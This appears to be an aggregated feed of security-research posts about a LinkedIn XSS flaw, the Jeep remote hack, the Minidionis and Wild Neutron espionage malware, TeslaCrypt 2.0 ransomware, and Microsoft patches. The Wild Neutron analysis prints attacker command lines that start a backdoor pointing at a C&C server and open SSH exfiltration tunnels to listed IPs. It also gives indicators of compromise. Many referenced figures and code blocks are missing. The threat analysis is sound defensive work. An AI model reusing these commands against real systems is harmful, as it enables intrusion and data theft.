Malware RSS Feed
On November 14, 2014, security researchers from Kaspersky Lab warned LinkedIn, the world’s largest business-oriented social network, about a security issue that could pose a major threat to its 360+ million users. Because LinkedIn attracts so many people in the business community, a security flaw such as this one could help attackers to efficiently execute spear phishing campaigns, steal credentials and potentially gain remote control over selected victims without needing to resort to social engineering.
Linkedin engaged to remediate the threat and had since issued a fix to the vulnerable platform.
“While certain HTML content should be restricted and we have issued a fix and thanked Kaspersky researchers; the likelihood of exploit on popular modern email platforms is unlikely.” says David Cintz, Senior Technical Program Manager at Linkedin security ecosystem.
Researchers found the vulnerability after noticing escape character differences when posting comments from different devices in various posts. The second alert was a malfunction in the platform’s back-end parser that simply interpreted a CRLF (“Enter” keystroke) to an HTML tag <br />, appending it to the post as text. The two were not connected to each other, but they both raised important questions.
Although it may sound like not that big of a deal, a tiny malfunction like this attracts the attention of attackers. Looking at those two behaviors, researchers were convinced that something was not right. It seems like no one had noticed it. It took a trained eye to assemble the pieces of the puzzle.
ENTER keystroke being interpreted to plain-text <br /> element
Submitting multiple posts from a web browser had successfully imitated part of the behavior of the escape character differences, but there was no lead on how to bypass the anti-Cross-site Scripting (XSS) engine and generate an attack.
Further research led to a major discovery. There was a reason why the output from one device was not encoded the same as the other.
Submitting comments with HTML tags from the web platform generated %3C as the less-than character, while the same input from a mobile device was encoded to <. Further inspections led to the presence of two different platforms. But that did not mean that the web platform was vulnerable. Or did it?
Another interesting insight was that every comment to a post is sent via an email platform to all other users who were part of the thread. The differences in the body of that email confirmed our suspicions. The following screenshots illustrate the two scenarios:
A comment posted from the website with a proper escape
A comment posted from the mobile application without an escape
That proved that two different email platforms exist and that mobile notifications could help to deliver a malicious payload without any user-supplied input validations.
Signed email bounced from Linkedin regardless of its content
Social platforms are a big target for hackers. Companies in general are hit by white hat hackers on a daily basis, trying to get a piece of the internet security pie. But what if a black hat hacker finds the issue?
Looking at the following chart, we can assess how this type of security issue might give an attacker a big chunk of the solution to the problem of how to distribute malicious software under the guise of a legitimate social platform notification.
Generic Malware Distribution Cycle
Malware authors invest a lot of time in achieving each of these milestones. Every step has a big impact on the overall outcome: solid programming that can adapt to multiple systems/devices, packers and binders, obfuscation and encryption, combining reconnaissance with the right distribution method and finding the right zero-day or exploit to remotely control the system.
To save valuable time, attackers find clever ways to approach authors and purchase their needs for each milestone, as if they were goods in a store. Finalizing the shopping list to cook up this type of attack might cost a lot. A business-oriented social platform that gives details of millions of business men and women, along with their titles, colleagues, career information and more, could be extremely valuable. It’s not difficult to target a user, and exploiting that information is just a single comment away.Choose your victim
Injecting a malicious comment into a user’s post thread will automatically launch a notification to his email account, regardless of the email provider or connection hierarchy between the victim and the attacker.
Although it seems that the application server had escaped the dangerous characters, the payload is only escaped from the main application. The email template is sent as it is.
Injecting malicious payload via mobile application
Another scenario might involve using an associated HTML form to collect information about the victim or redirect the victim to a site where a malicious executable can be downloaded.
Example scenario – stealing credentials
Last November Kaspersky Lab researchers contacted Linkedin’s security team, and informed them about the issue. The platform was fixed and the threat has been mitigated.
How to prevent yourself from becoming a victim:
- Use an advanced Internet Security solution to filter out dangerous redirections to servers that contain malware, phishing and more. If a solution is already installed, keep it updated at all times.
- Opening an attachment or following a link in an email – even from a known party – might contain malicious content. Be very wary before making the decision to open it.
- Do not register to social platforms with your corporate email account.
Jonathan Jaquez – CEO, Mageni.net
David Cintz – Sr. Technical Program Manager, Linkedin
The day before yesterday was an important day for the information security industry. Investigators announced exploitation of the first ever 0-day vulnerability for cars. The wireless attack was demonstrated on a Jeep Cherokee.
Charlie Miller and Chris Valasek found the vulnerability in the onboard computer of the car. People have been talking for a long time about attacks on such systems if the attackers have access to a diagnostics jack. However a remote attack on a car’s critical systems remained a purely theoretical scenario about which experts have warned for a long time (including experts from Kaspersky Lab). Many hoped that the car manufacturers would recognise the risk of such vulnerabilities being exploited and take preventive measures. Well, we overestimated them.
The investigators gained access through the onboard entertainment system not only to non-critical settings but also the car’s controls like brakes and accelerator. The investigators plan to publish the technical details of the hack in August but the overall scheme of things is already known.Car Hack
To start with, the air conditioner, radio and windscreen wipers went crazy and the driver could do nothing about it. And then the car itself. The accelerator and brakes of the Jeep responded only to the remote investigators and not to the car’s owner at the wheel.
It is important here to note that the car had not been modified. All the above was carried out using a vulnerability in the onboard Uconnect system, which handles contact with the outside world via the infrastructure of the Sprint cell operator in cars of the FCA auto-group (Chrysler, Dodge, Fiat, Jeep and Ram). It is enough to know the external IP-address of the victim to rewrite the code in the head unit of the car (more about these units a bit later).
The company has already released a patch for Uconnect, which can be installed either at official dealers, or, for the technically minded, independently via a USB-port. At the moment the investigators can see a vehicle’s VIN, GPS coordinates and IP address by connecting to the Sprint network and using the 0-day exploit they found. By the way, to find the specific vehicle among the 471 thousand vehicles with Uconnect on board is, according to the investigators, rather difficult.A conceptual defence
This is not the first incident showing the insufficient safety mechanisms built in to modern cars as standard. Before this we saw the local seizure of the steering through the OBD-II diagnostic port and an illicit software update through a false cell base station.
Both the operating system manufacturers and the car manufacturers are now implementing important and necessary but insufficient cyber security measures. The situation is made worse by the fact that the architecture of the onboard electronic networks of vehicles was developed in the 80s, when the idea that a car would be connected to the Internet was something out of science fiction. And, consequently, although the electronic components are reliable and functionally safe the same can not be said about their cyber-security. Here at Kaspersky Lab, as in the case with conventional computer networks, we are convinced that complete multi-level safety will only be achieved by a combination of the right architecture, developed taking into account all risks, including cyber-risks, the correct setup of pre-established equipment and the use of specialised solutions.Architecture
The Kaspersky Lab approach is based on two fundamental architectural principles: isolation and controlled communications.
Isolation guarantees that two independent entities can in no way affect each other. For example, entertainment applications will not be able to affect the technical network. Not on board an aircraft and not in a car.
Control of communications guarantees that two independent entities which should work together for the system to function will do so strictly in accordance with the safety and security policy. For instance the system for acquisition of telemetry and sending it to the service centre can only read data about the condition of the car but not transfer control signals. This sort of control would have been of great help to our Jeep owner.
The use of cryptography and authentication for the transfer and receipt of information within and from outside are also indispensable parts of a protected system. But, judging by the results of the investigators, Jeep either used weak vulnerable algorithms or the cryptography was implemented with errors or not implemented at all.
The described approach — isolation and control of communications – comes naturally to a micro-kernel operating system with controlled inter-process interaction. Each logical domain has its own address space and all contact between domains is always carried out via a safety monitor.Products
Of the onboard electronics controlling critically important functions of the vehicle and theoretically open to attack the key elements are the head unit (HU) and the electronic control units (ECU), which form a whole network of controllers. There are control blocks for the engine, transmission, suspension etc.
Head units work on real time operating systems (RTOS) such as QNX, VxWorks and others. Kaspersky Lab intends to offer its own protected operating system for head units after obtaining the necessary certificates.
Both of the architectural principles mentioned above (isolation and control of communications) are fundamental principles of KasperskyOS — a safe micro-kernel operating system with controlled inter-process interaction.
The operating system was created from scratch and security was its main priority from the word go. This is the main difference between our product and the operating systems now installed in cars. We called a key component of our safe operating system the Kaspersky Security System (KSS)
During operation this system has responsibility for calculating a verdict on the security of any given event happening in the system. On the basis of this verdict the kernel of the operating system takes a decision to allow or block the event or inter-process communication. With the help of the KSS it is possible to control any activity — access to ports, files, network resources via specific applications etc. At the moment KSS works on PikeOS and Linux.
The software on the electronic control blocks is only small blocks of code and for these Kaspersky Lab intends to cooperate with microelectronics firms to jointly guarantee the safety of this embedded software.In place of a conclusion
We really don’t want to deny ourselves the comforts which the computerisation of cars has brought. However if car manufacturers don’t start taking the problem of the cyber-security of their Internet-connected cars seriously and don’t start demanding that car component manufacturers do the same then people who are concerned about safety will have to switch to classic cars. Yes old cars don’t have computers. Yes they don’t have computer-controlled fuel injection, navigation systems, climate control and other modern gadgets. But on the other hand they only obey the person at the wheel.
Yesterday our colleagues from Paloalto networks presented a research uncovering Minidionis (also known by the Kaspersky codename – “CloudLook”). It’s an another backdoor from APT group responsible for other attacks such as CozyDuke , MiniDuke, and CosmicDuke.
Analyzing this malware we noticed that attackers implemented a capability of cloud drive usage to store malware samples and downloading them on infected systems. Almost one year ago, we observed another APT group codenamed “CloudAtlas” (link), also using cloud drives to store the stolen information. And now we see a similar technique in CloudLook/Minidionis.
Minidionis uses multidropper scheme to infect it victims. Usually attacker’s uses spear-phishing emails with a self-extracting archive pretending to be a voicemail. When victim opens an archive the second stage dropper executes and a .wav file plays looking like a real voicemail. Also attackers were using a self-extracting archive containing a PDF file luring it’s victims with information regarding world terrorism:
After successful execution the second stage dropper of Minidionis malware uses Onedrive cloud storage to download payload from:
The malware maps an Onecloud storage drive as network drive using hardcoded login and password, and then copies files that stored in cloud to the local system:
Could this approach become a mainstream? It’s quite possible, because it gives the attackers a simple method of hiding malicious behavior – detection of to-the-cloud malicious traffic is more complicated as it means also blocking legitimate services.
According to Kaspersky Security Network, every single attack using Minidionis/CloudLook backdoors was specifically crafted for a particular target. This indicates that the attacks are highly customized and focused on value targets. So far, we’ve observed several targets, most notably in diplomatic organizations from Europe.
Kaspersky Lab detects all known samples of Minidionis/CloudLook as Trojan.Win32.Generic, and successfully protects its users against the threat.
Microsoft releases a long list of updates to multiple technologies today with 14 Security Bulletins (MS15-058, MS15-065 – MS15-077) patching 58 vulnerabilities, and at least 47 of them reported through a a responsible disclosure channel. Meanwhile, several are being used and detected ITW as a part of limited targeted attacks, like the Microsoft Office RCE cve-2015-2424, ATMFD.DLL EoP cve-2015-2387, and the Internet Explorer JScript9 RCE cve-2015-2419. Some were the result of breach leaks as well. A number of these have a very attractive offensive utility to defend against, so expect to see these exploits being used and re-used. Most of the July updates fall under two main categories, and the updated technologies are listed below. All of the Windows versions from Windows 7 and up maintain a critical RCE vulnerability of one sort or another. Update ASAP.
Remote code execution vulnerabilities
- Windows Server Hyper-V
- Windows DLL Handling
- SQL Server
- Internet Explorer
- VBScript Engine
- Remote Desktop Protocol (RDP)
- Microsoft Office
Elevation of privilege vulnerabilities
- Windows Graphics Component
- Windows Kernel (win32k.sys)
- Windows Installer Service
- Windows Remote Procedure Call Service
- Windows ATM Font Driver
- SQL Server
Vulnerabilities falling under other categories like XSS filter bypass, information disclosure, ASLR bypass, authentication spoofing
- Internet Explorer
- Microsoft Excel
- Windows Kernel (win32k.sys)
The most interesting of these vulnerabilities includes the RDP RCE and the Hyper-V RCE. The RDP vulnerability affects even the stripped down Windows Server 2012 Server Core installation, and seems to have been reported by an anonymous source unusually wanting no credit for a remotely exploitable critical vulnerability for a service that is often externally exposed. While Microsoft is doubtful that remote code execution is reliable, they at least acknowledge the possibility. In the past, their denial had been corrected by researchers on the potential for heap feng shei leading to exploitation of certain services, including the 2010 bug in their IIS FTPsvc.
Another couple are the Hyper-V RCE, which are buffer overflow cve-2015-2361 in the Storvsp.sys driver and an unusual “data structure vulnerability” cve-2015-2362 present in Vmicrdv.dll, Vmicvss.dll, Vmicshutdown.dll, Vmictimesync.dll, Vmicheartbeat.dll, and Vmickvpexchange.dll, available across Windows Hyper-V on Windows Server 2008, Windows Server 2008 R2, Windows 8 and Windows Server 2012, and Windows 8.1 and Windows Server 2012 R2. These were both found by an internal Microsoft engineer. Much like the Cloudburst exploit from years ago on VMWare, these enable code with execution escape from a virtual guest operating system into the host system.
Full list of July cve being updated here:
The TeslaCrypt family of ransomware encryptors is a relatively new threat: its samples were first detected in February 2015. Since then the malware has been widely portrayed in mass media as the ‘curse’ of computer gamers because it targets many game-related file types (game saves, user profiles, etc.). The Trojan’s targets have included people in the US, Germany, Spain and other countries.
TeslaCrypt is still in the active development phase: in the past months, its appearance, the name shown to victims (the malware can mimic CryptoLocker and has used the names TeslaCrypt and AlphaCrypt), extensions of encrypted files (.ecc, .ezz, .exx), as well as implementation details, have all changed.
Kaspersky Lab recently discovered the latest version of the Trojan – TeslaCrypt 2.0. This version is different from previous ones in that it uses a significantly improved encryption scheme, which means that it is currently impossible to decrypt files affected by TeslaCrypt. It also uses an HTML page instead of a GUI. Incidentally, the HTML page was copied from another Trojan – Cryptowall.
Kaspersky Lab products detect malware from the TeslaCrypt family as Trojan-Ransom.Win32.Bitman. The latest version of the Trojan that is discussed in this paper is detected as Trojan-Ransom.Win32.Bitman.tk, its MD5-hash: 1dd542bf3c1781df9a335f74eacc82a4Evolution of the threat
Each TeslaCrypt sample has an internal version of the malware. The first sample we found was version 0.2.5. It had borrowed its graphical interface, including the window header, from another encrypting ransomware program – CryptoLocker.
By version 0.4.0, the developers of TeslaCrypt had completely changed the malware’s appearance.
The following features of the malware family remain the same, regardless of the version:
- The Trojan independently generates a new, unique Bitcoin address and a private key for it. The address is used both as a victim ID and to receive payments from the victim.
- The AES-256-CBC algorithm is used to encrypt files; all files are encrypted with the same key.
- Files larger than 0x10000000 bytes (~268 MB) are not encrypted.
- C&C servers are located on the Tor network; the malware communicates with the C&Cs via public tor2web services.
- Files encrypted by the malware include many extensions matching files used in computer games.
- The Trojan deletes shadow copies.
- In spite of the scary stories about RSA-2048 shown to victims, this encryption algorithm is not used by the malware in any form.
- The Trojan was written in C++, built using Microsoft’s compiler, with cryptographic algorithm implementation taken from the OpenSSL library.
- Early versions of TeslaCrypt (0.2.5 – 0.3.x) were designed to check whether a bitcoin payment had been successfully made on the site http://blockchain.info. If the payment was received, the malware reported this to the command server and received a key to decrypt the files. This scheme was vulnerable, since an expert could send a request to the C&C and get the necessary key without making a payment.
- Versions 0.2.5 – 0.3.x saved the decryption key (with other data) in their own service file, key.dat. The area containing the key was zeroed out in the file only after completing encryption, making it possible to save the key by interrupting the encryptor’s operation (e.g., by turning off the computer). After this, the key could be extracted from key.dat and used to decrypt all files.
- In version 0.4.0 the file key.dat was renamed to storage.bin, and the decryption key was not stored openly but as a multiplicative inverse modulo the order of the standard elliptic curve secp256k1. On completing encryption, the key was overwritten with random bytes rather than zeros, but it was still possible to extract the key before the area was overwritten. This was implemented in our RakhniDecryptor utility.
Recently a sample of the Trojan with internal version 2.0.0 caught our attention. So what was different this time?
The first thing that caught the eye was that TeslaCrypt no longer has code responsible for rendering the GUI (the application window). Instead, after encrypting the files the Trojan opens an HTML page in the browser. The page was fully copied from another infamous ransomware program – CryptoWall 3.0.
The page that opens when a victim follows one of the links provided by the cybercriminals is also identical to the CryptoWall payment page, with one exception: the URLs lead to a TeslaCrypt server – the authors of the malware were certainly not going to let their rivals get their victims’ money.
TeslaCrypt initializes a string with text about CryptoWall
Why use this false front? We can only guess – perhaps the attackers wanted to impress the gravity of the situation on their victims: files encrypted by CryptoWall still cannot be decrypted, which is not true of many TeslaCrypt infections.
In any event, this is not the only change from the previous version of TeslaCrypt. The encryption scheme has been improved again and is now even more sophisticated than before. Keys are generated using the ECDH algorithm. The cybercriminals introduced it in versions 0.3.x, but in this version it seems more relevant because it serves a specific purpose, enabling the attackers to decrypt files using a ‘master key’ alone. More about this in due course.The TeslaCrypt 2.0 encryption scheme Generation of key data
The Trojan uses two sets of keys – ‘master keys’ that are unique for each infected system and ‘session keys’ that are generated each time the malware is launched on the system.Master key generation
Let Q be a standard secp256k1 elliptic curve (“SECG curve over a 256 bit prime field”) and G be the generator of a cyclic subgroup of points on this curve.
Let malware_pub be the attackers’ public key contained in the Trojan’s body (it is a point on the Q curve, stored as two separate coordinates – x and y).
When infecting a system, the Trojan generates:
- install_id – the infection identifier – a random 8-byte sequence.
- master_btc_priv – the private master key – a random 32-byte sequence, which is sent to the C&C.
- master_btc_pub = master_btc_priv * G (point on the curve) – the public master key; stored in encrypted files.
- btc_address – a bitcoin address used to receive the ransom payment – generated using the standard Bitcoin algorithm, based on master_btc_pub.
- master_ecdh_secret = ECDH(malware_pub, master_btc_priv) – a “shared master key”, required for decryption if master_btc_priv is lost or does not reach the C&C; not saved anywhere in this form.
- master_ecdh_secret_mul = master_ecdh_secret * master_btc_priv – a number that can be used to recover master_btc_priv; stored in the system.
master_btc_priv (in accordance with the Bitcoin operating principle) is a private key that is needed to ‘withdraw’ the Bitcoins sent to the newly created address btc_address.
Every time it is launched (when first infecting a computer or, e.g., after a reboot), the Trojan generates new copies of:
- session_priv – a private session key – random 32 bytes. Used to encrypt files, not saved anywhere
- session_pub = session_priv * G – a public session key. Stored in encrypted files.
- session_ecdh_secret = ECDH(master_btc_pub, session_priv) – a “shared session key” – needed to decrypt files, not saved anywhere in this form.
- session_ecdh_secret_mul = session_ecdh_secret * session_priv – a number that can be used to recover session_ecdh_secret. Stored in encrypted files.
Unlike previous version of the malware, TeslaCrypt 2.0.0 does not use key.dat or storage.bin to store data. Instead, it uses the system registry: an install_id value is stored in HKCU\Software\msys\ID, and the following structure is added to HKCU\Software\<install_id>\data:
In the familiar syntax of the C programming language, the structure can be described as follows:
Here is what it looks like on an infected system:
Starting from version 0.3.5, TeslaCrypt affects both regular drives connected to the system and all file resources available on the network (shares), even if they are not mounted as drives with letters of their own. Few other encryptors can boast this functionality.
Each file is encrypted using the AES-256-CBC algorithm with session_priv as a key. An encrypted file gets an additional extension, “.zzz”. A service structure is added to the beginning of the file, followed by encrypted file contents. The structure has the following format:
The same structure in C language syntax:
The authors of TeslaCrypt 2.0.0 completely removed the file decryption feature that was present in earlier versions of the malware. Based on analyzing the encryption scheme described above, we can suggest the following algorithms for decrypting the files:
If master_btc_priv is known, do the following:
- Read session_pub from the encrypted file;
- Calculate session_ecdh_secret = ECDH(session_pub, master_btc_priv);
- Read session_ecdh_secret_mul from the encrypted file;
- Calculate session_priv = session_ecdh_secret_mul / session_ecdh_secret;
- Decrypt the file using the session_priv key.
If master_btc_priv is unknown, but malware_priv is known (and the only people who know it are the cybercriminals who added the corresponding malware_pub to the Trojan’s body):
- Read master_btc_pub from the registry or encrypted file;
- Calculate master_ecdh_secret = ECDH(master_btc_pub, malware_priv);
- Read master_ecdh_secret_mul from the encrypted file
- Calculate master_btc_priv = master_ecdh_secret_mul / master_ecdh_secret;
- With master_btc_priv known, perform the steps from item 1.
The Trojan implements a detection evasion technique based on using COM objects. We first saw it used in TeslaCrypt version 0.4.0, but since then it has been slightly modified. Pseudocode generated based on version 2.0.0 looks like this:
The Trojan’s sample contains a static list of C&C addresses. The servers are actually on the Tor network, but communication with them is carried out through the Web using tor2web services.
Before TeslaCrypt version 0.4.1, server requests were sent in plaintext; in subsequent versions they were encrypted using the AES-256-CBC algorithm, with a SHA256 hash of a static string from the malicious program’s body used as a key.
The pseudocode screenshot below shows the process of creating an HTTP request to be sent by the Trojan when infecting a system.
Malware from the TeslaCrypt family is known to be distributed using exploit kits such as Angler, Sweet Orange and Nuclear. This method of distributing malware works as follows: when a victim visits an infected website, an exploit’s malicious code uses vulnerabilities in the browser (usually in plugins) to install target malware in the system.
Geographical distribution of users attacked by malware from the TeslaCrypt familyRecommendations
To protect data from encrypting ransomware, we advise users to backup all their important files regularly. Backup copies should be stored on drives that can only be written to as part of the process of backing up data. For example, home users can use external hard drives, physically disconnecting them from the computer immediately after creating backup copies.
Promptly updating software (particularly browser plugins and the browser itself) is also extremely important, since vendors are always striving to close any vulnerabilities that are exploited by cybercriminals.
If malware did find its way into the system, an up-to-date antivirus product with updated databases and activated protection modules can help to stop it from doing any harm. This is especially true of the proactive protection module, which is the last line of defense against 0-day threats.
A powerful threat actor known as “Wild Neutron” (also known as “Jripbot” and “Morpho”) has been active since at least 2011, infecting high profile companies for several years by using a combination of exploits, watering holes and multi-platform malware.
The latest round of attacks in 2015 uses a stolen code signing certificate belonging to Taiwanese electronics maker Acer and an unknown Flash Player exploit.
Wild Neutron hit the spotlight in 2013, when it successfully infected companies such as Apple, Facebook, Twitter and Microsoft. This attack took advantage of a Java zero-day exploit and used hacked forums as watering holes. The 2013 incident was highly publicized and, in the aftermath, the threat actor went dark for almost one year.
#WildNeutron is a powerful entity engaged in espionage, possibly for economic reasonsTweet
In late 2013 and early 2014 the attacks resumed and continued throughout 2015. Targets of the new attacks include:
- Law firms
- Bitcoin-related companies
- Investment companies
- Large company groups often involved in M&A deals
- IT companies
- Healthcare companies
- Real estate companies
- Individual users
The focus of these attacks suggests this is not a nation-state sponsored actor. However, the use of zero-days, multi-platform malware as well as other techniques makes us believe it’s a powerful entity engaged in espionage, possibly for economic reasons.Older (2013) campaigns
During the 2013 attacks, the Wild Neutron actor successfully compromised and leveraged the website www.iphonedevsdk[.]com, which is an iPhone developers forum.
The attackers injected a script into the forum that redirected visitors to another website (min.liveanalytics[.]org – currently SINKHOLED by Kaspersky Lab) that hosted a Java zero-day exploit. A similar attack was also found in another forum dedicated to Linux developers: fedoraforum[.]org. For a more detailed analysis of these 2013 attacks, see Eric Romang’s blog.
Other forums compromised by the Wild Neutron group and identified by reports from the Kaspersky Security Network include:
In particular, two of these stand out: “community.flexispy[.]com” and “ansar1[.]info“. The first one is a community ran by Flexispy, a company that sells spyware for mobile devices. The second one is a Jihadist forum that is currently closed.
ansar1[.]info was injected by Wild Neutron in 2013
Back in 2013, the attackers also leveraged a Mac OS X backdoor, known as OSX/Pintsized. This is also described in more detail in Eric Romang’s excellent blog. The same backdoor, compiled for Win32, is still being used in the 2015 attacks.
#WildNeutron is one of the most unusual APT group we've analysed and trackedTweet
Some of the more prominent victims of the 2013 attack include Twitter, Facebook, Apple and Microsoft. These breaches were covered widely by the press and some affect companies, issued statements on the incident (see Facebook’s statement).
The targeting of major IT companies like Facebook, Twitter, Apple and Microsoft is unusual, however, it’s not entirely unique. The lack of victims in other sectors, such as diplomatic or government institutions, is however quite unusual. This makes us believe this is not a nation-state sponsored attack.Technical analysis
The malware set used by the Wild Neutron threat actor has several component groups, including:
- A main backdoor module that initiates the first communication with C&C server
- Several information gathering modules
- Exploitation tools
- SSH-based exfiltration tools
- Intermediate loaders and droppers that decrypt and run the payloads
Although customized, some of the modules seem to be heavily based on open source tools (e.g. the password dumper resembles the code of Mimikatz and Pass-The-Hash Toolkit) and commercial malware (HTTPS proxy module is practically identical to the one that is used by Hesperbot).
Although customized, some of the modules seem to be heavily based on open source tools #WildNeutronTweet
All C&C communication is encrypted with a custom protocol. Dropped executables, as well as some of the hardcoded strings are usually obfuscated with XOR (depends on bot version). The main backdoor module contains a number of evasion techniques, designed to detect or time out sandboxes and emulation engines.Exploitation – 2015
The initial infection vector from the 2014-2015 attacks is still unknown, although there are clear indications that the victims are exploited by a kit that leverages an unknown Flash Player exploit.
The following exploitation chain was observed in one of the attacks:Site hxxp://cryptomag.mediasource.ch/ Paths /favicon.ico
The subdomain cryptomag.mediasource[.]ch appears to have been created for this attack; it pointed to an IP address associated with other Wild Neutron C&Cs, highlighted in red below:
Hosts resolving to 66.55.133[.]89
While app.cloudprotect[.]eu and ssl.cloudprotect[.]eu are two known Wild Neutron C&Cs, cryptomag.mediasource[.]ch appears to have been pointed to this IP for the purpose of exploitation. Another suspicious domain can be observed above, secure.pdf-info[.]com. We haven’t seen any attacks connected with his hostname yet, however, the name scheme indicates this is also malicious.
In another attack, we observed a similar exploitation chain, however hosted on a different website, hxxp://find.a-job.today/.
In both cases, the visitors browsed the website, or arrived via what appears to have been an online advertisement. From there, “autoload.js” appears in both cases, which redirects to another randomly named HTML file, which eventually loads a randomly named SWF file.
While the group used watering hole attacks in 2013, it’s still unclear how victims get redirected to the exploitation kits in the new 2014-2015 attacks. Instead of Flash exploits, older Wild Neutron exploitation and watering holes used what was a Java zero-day at the end of 2012 and the beginning of 2013, detected by Kaspersky Lab products as Exploit.Java.CVE-2012-3213.b.The main malware dropper
The functionality of the main dropper is relatively simple: it decrypts the backdoor executable (stored as a resource and encrypted with a simple XOR 0x66), writes it to a specified path and then executes it with parameters that are hardcoded in the dropper body. One of the parameters is the URL address of the C&C server, while others contain various bot configuration options.
Example parameters used by the dropper:
igfxupt.exe https://app.cloudprotect[.]eu:443 /opts resolv=logs.cloudprotect[.]eu
After executing the main backdoor, the dropper is securely deleted by overwriting its content with random numbers several times before renaming and removing the file.The main backdoor (aka “Jripbot”)
This binary is executed with a parameter that the URL address of the C&C server and optionally an initial bot configuration; this information is then double-encrypted – first with RC4 and then with Windows CryptProtectData function – and saved to the registry.
Before performing any other activity, the malware first runs its stalling code (designed to outrun the emulators), then performs several anti-sandboxing checks and enters an infinite loop if any unwanted software running in the system is detected.
Otherwise, it gathers some basic system information:
- Version of the operating system
- If program is running under WOW64
- If current user has administrator privileges
- Which security features of Windows are enabled
- Username and computer name
- Server name and LAN group
- Information about logical drives
- System uptime and idle time
- Default web browser
- Proxy settings
Based on some of this information, malware generates a unique ID for the victim and starts the C&C communication by sending the ID value and awaiting commands.
Backdoor configuration options may include proxy server address and credentials, sleeptime/delay values and connection type, but the most interesting option is the resolv=[url] option. If this option is set, the malware generates a domain name consisting of computer name, unique ID and and the URL passed with this option; then it tries to resolve the IP address of this domain. We suspect this is the method the attackers use to send the generated UID to the C&C.
Commands from the C&C may instruct the bot to perform following actions:
- Change the current directory to the requested one
- Execute an arbitrary command in the command line
- Set the autorun value for itself in the registry
- Delete the autorun value for itself in the registry
- Shred requested file (overwrite the file content with random numbers, overwrite the file name with zeroes and then delete it)
- Download file from the Internet and save it (optionally encrypted) to the disk
- Install or uninstall additional malware plugins
- Collect and send system information
- Enumerate drives
- Set sleeptime value
- Update the configuration
- Update itself
Older versions of this backdoor, used in the 2013 attacks, had a bit more functionality:
- Password harvesting
- Port scanning
- Collecting screenshots
- Pushing files to C&C
- Reverse shell
These features were removed from the newer backdoor versions that are used in recent attacks. Instead, malware developers decided to implement a plugin mechanism and run different tools for different tasks. This suggests a clear shift towards more flexible modular architecture.
#WildNeutron hide the C&C address by encrypting it in the registry with machine-dependent informationTweet
In terms of functionality, the main backdoor is no different from many other Remote Access Tools (RATs). What really stands out is the attacker’s carefulness to hide the C&C address, by encrypting it in the registry with machine-dependent information. Also notable is the ability to recover from a C&C shutdown by contacting a dynamically generated domain name, which only the attackers know in advance, as it is directly tied to each unique victim.
According to the timestamp of the samples the distribution is as follows:
Each backdoor appears to contain an internal version number, which ranges from 11000 to 16000 in the latest samples. This allows us to trace the following evolutionary map:
Backdoors used in the 2013 attacks:MD5 Timestamp Version Filename Size 1582d68144de2808b518934f0a02bfd6 29 Nov 2012 11000 javacpl.exe 327168 14ba21a3a0081ef60e676fd4945a8bdc 30 Nov 2012 12000 javacpl.exe 329728 0fa3657af06a8cc8ef14c445acd92c0f 09 Jan 2013 13000 javacpl.exe 343552
Backdoors used in 2014 and 2015 attacks:MD5 Timestamp Version Filename Size 95ffe4ab4b158602917dd2a999a8caf8 13 Dec 2013 14014 LiveUpdater.exe 302592 342887a7ec6b9f709adcb81fef0d30a3 20 Jun 2014 15013 FlashUtil.exe 302592 dee8297785b70f490cc00c0763e31b69 02 Aug 2013
(possibly fake) 16010 IgfxUpt.exe 291328 f0fff29391e7c2e7b13eb4a806276a84 27 Oct 2014 16017 RtlUpd.exe 253952
The installers also have a version number, which indicates the following evolution:MD5 Timestamp Version 1f5f5db7b15fe672e8db091d9a291df0 16 Dec 2011 1.4.1 48319e9166cda8f605f9dce36f115bc8 28 Sep 2012 1.5.0 088472f712d1491783bbad87bcc17c48 12 Apr 2013 1.6.3 ee24a7ad8d137e54b854095188de0bbf 07 Jan 2014 1.6.4 Lateral movement
After installing the main backdoor and establishing initial C2 communication, the attackers use a range of different tools to extract sensitive data and control the victim’s machine. These tools include a password harvesting trojan, a reverse-shell backdoor and customized implementations of OpenSSH, WMIC and SMB. Sometimes, they only drop a simple perl reverse shell and use various collection methods to retrieve credentials from a set of machines, escalate privileges, and fan out across a network from there. Besides these tools, there is also a number of small utility modules of different functionalities, from loaders and configuration tools, to file shredders and network proxies.
It’s also worth noting that this threat actor heavily relies on already existing code, using publicly available open source applications, as well as Metasploit tools and leaked malware sources, to build its own toolset. Some of these tools are designed to work under Cygwin and come together with the Cygwin API DLL, which may suggest that the attackers feel more comfortable when working in a Linux-like environment.SSH tunnel backdoor
During the 2014/2015 attacks, we observed the attackers deploying custom, OpenSSH-based Win32 tunnel backdoors that are used to exfiltrate large amounts of data in a reliable manner. These tunnel backdoors are written as “updt.dat” and executed with two parameters, -z and -p. These specify the IP to connect to and the port. Despite the port number 443, the connection is SSH:
- /d /u /c updt.dat -z 188.8.131.52 -p 443
- /d /u /c updt.dat -z 184.108.40.206 -p 443
- /d /u /c updt.dat -z 220.127.116.11 -p 443
For authentication, the SSH tunnel backdoor contains a hardcoded RSA private key.Stolen certificate
During the 2015 attacks, Wild Neutron used a dropper signed with a stolen, yet valid Acer Incorporated certificate.
Acer signature on Wild Neutron dropper
The abused certificate has the following properties:
Serial: 5c c5 3b a3 e8 31 a7 df dc 7c 28 d5 15 8f c3 80
Thumbprint: 0d 85 91 41 ee 9a 0c 6e 72 5f fe 6b cf c9 9f 3e fc c3 fc 07
The dropper (dbb0ea0436f70f2a178a60c4d8b791b3) appears to have been signed on June 15, 2015. It drops a Jripbot backdoor as “IgfxUpt.exe” and configures it to use the C&C “app.cloudprotect[.]eu”.
#WildNeutron used a dropper signed with a stolen, yet valid Acer Incorporated certificateTweet
We have contacted Verisign and requested revocation of the certificate.Victims and statistics
The Wild Neutron attacks appear to have a highly targeted nature. During our investigation, we have been able to identify several victims across 11 countries:
- United States
The victims for the 2014-2015 versions are generally IT and real estate/investment companies and in both cases, a small number of computers have been infected throughout the organizations. The attackers appear to have updated the malware implant and deployed some additional tools, however, we haven’t observed serious lateral movement in these cases.Attribution
The targeting of various companies, without a government focus, makes us believe this is not a nation state sponsored APT. The attackers have also shown an interest in investment related targets, which indicate knowledge and skills to exploit such information on the market to turn it into financial advantages.
In some of the samples, the encrypted configuration includes a Romanian language string #WildNeutronTweet
In some of the samples, the encrypted configuration includes a Romanian language string, which is used to mark the end of the C&C communication:
Interestingly, “La revedere” means “goodbye” in Romanian. In addition to that, we found another non-English string which is the latin transcription of the russian word Успешно (“uspeshno” -> “successfully”); this string is written to a pipe after executing a C2 command.
We found another non-English string which is the latin transcription of the russian word #WildNeutronTweet
One of the samples has an internal name of “WinRAT-Win32-Release.exe”. This seems to indicate the authors are calling the malware “WinRAT”.
